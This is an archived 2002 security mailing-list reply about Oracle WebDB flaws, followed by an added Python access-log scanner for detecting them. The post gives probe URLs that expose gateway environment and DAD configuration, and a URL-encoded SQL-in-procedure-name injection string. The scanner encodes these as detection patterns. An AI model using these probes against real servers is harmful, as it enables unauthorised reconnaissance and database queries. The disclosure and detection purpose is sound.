


Vulnerability Development: Re: Correction - Oracle Apache+WebDB info leakage

From: Scalise, Marzio <marzioscalise_at_KPMG.it>
Date: Mon, 4 Feb 2002 17:03:55 +0100

>While I was going through the Oracle Apache+WebDB vulnerability, I found
>something else also
>interesting, I don't know if anyone has posted this before, but here it goes
>anyway.

>If you request the following: http://<hostname>:<port>/pls/admin
>The following info is displayed:
>Sun, 3 Feb 2002 19:57:12 GMT
>No DAD configuration Found
> DAD name:
> PROCEDURE :
> URL : http://<hostname>:<port>/pls/admin
> PARAMETERS :
> ===========
>
> ENVIRONMENT:
> ============
> PLSQL_GATEWAY=WebDb
> GATEWAY_IVERSION=2
> SERVER_SOFTWARE=Apache/1.3.12 (Unix) ApacheJServ/1.1 mod_perl/1.22

[CUT...]

Hi
Yes, Michal Zalewski has posted this bug.

http://www.securityfocus.com/archive/1/153186

There are 2 bugs for Web DB.
1) You can "view" the DAD configuration on the database server:

http://<host>/pls/<name_of_dad>/admin_/gateway.htm

2) Oracle WebDB accepts a PL/SQL procedure on the web; for example, if you
write in the browser:

http://<hostname>:<port>/pls/<name_of_dad>/select%09*%09from%09cat%01

the following info is displayed:

ORA-06550 row 7
PLS-00428 A INTO clause waited in this instruction .. (sorry, I have WebDB in
Italian and I translate word by word)
PL/SQL: SQL statement ignored

Hope this helps

 
                 Marzio Scalise
                 Information Risk Management

                 KPMG S.p.A.
                 pgp key is available at:
                 http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x606359A9
 

Received on Feb 04 2002
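
Added example (not part of the original message or of any Oracle tooling): a small Apache access-log check for the three request shapes discussed in this thread, namely a /pls/ request naming no configured DAD, a request under admin_/ of a DAD, and SQL text or control bytes where a procedure name belongs. The DAD name "webdb", the log layout and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Request field of an Apache common/combined log line (assumed layout).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# /pls/<dad>[/<procedure path>], query string excluded.
PLS_RE = re.compile(r"^/pls/([^/?]+)(?:/([^?]*))?", re.I)
# A SQL verb followed by whitespace where a procedure name belongs.
SQL_RE = re.compile(
    r"^\s*(select|insert|update|delete|drop|create|alter|grant)\s", re.I)

def classify(path, known_dads):
    """Label a request path against the patterns in the thread, else None."""
    m = PLS_RE.match(path)
    if not m:
        return None
    dad, rest = m.group(1).lower(), unquote(m.group(2) or "")
    if dad not in known_dads:
        return "unknown-dad"            # gateway replies with its environment
    if rest.lower().startswith("admin_/"):
        return "dad-admin-page"         # e.g. admin_/gateway.htm
    if SQL_RE.match(rest) or any(ord(c) < 0x20 for c in rest):
        return "sql-in-procedure-name"  # SQL verb or encoded control bytes
    return None

def scan(lines, known_dads):
    """Return (line_number, label, raw_path) for every flagged log line."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        label = classify(m.group(1), known_dads) if m else None
        if label:
            hits.append((n, label, m.group(1)))
    return hits

# Constructed sample lines: documentation addresses, hypothetical DAD "webdb".
SAMPLE_LOG = [
    '192.0.2.10 - - [04/Feb/2002:17:00:01 +0100] "GET /pls/webdb/home.show HTTP/1.0" 200 5120',
    '192.0.2.44 - - [04/Feb/2002:17:01:12 +0100] "GET /pls/admin HTTP/1.0" 200 812',
    '192.0.2.44 - - [04/Feb/2002:17:01:30 +0100] "GET /pls/webdb/admin_/gateway.htm HTTP/1.0" 200 2301',
    '192.0.2.44 - - [04/Feb/2002:17:02:05 +0100] "GET /pls/webdb/select%09*%09from%09cat%01 HTTP/1.0" 200 640',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG, {"webdb"}):
        print(hit)
```

Pass the set of DAD names actually configured on the gateway as known_dads; anything outside that set is reported because such requests return the "No DAD configuration Found" page quoted above.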
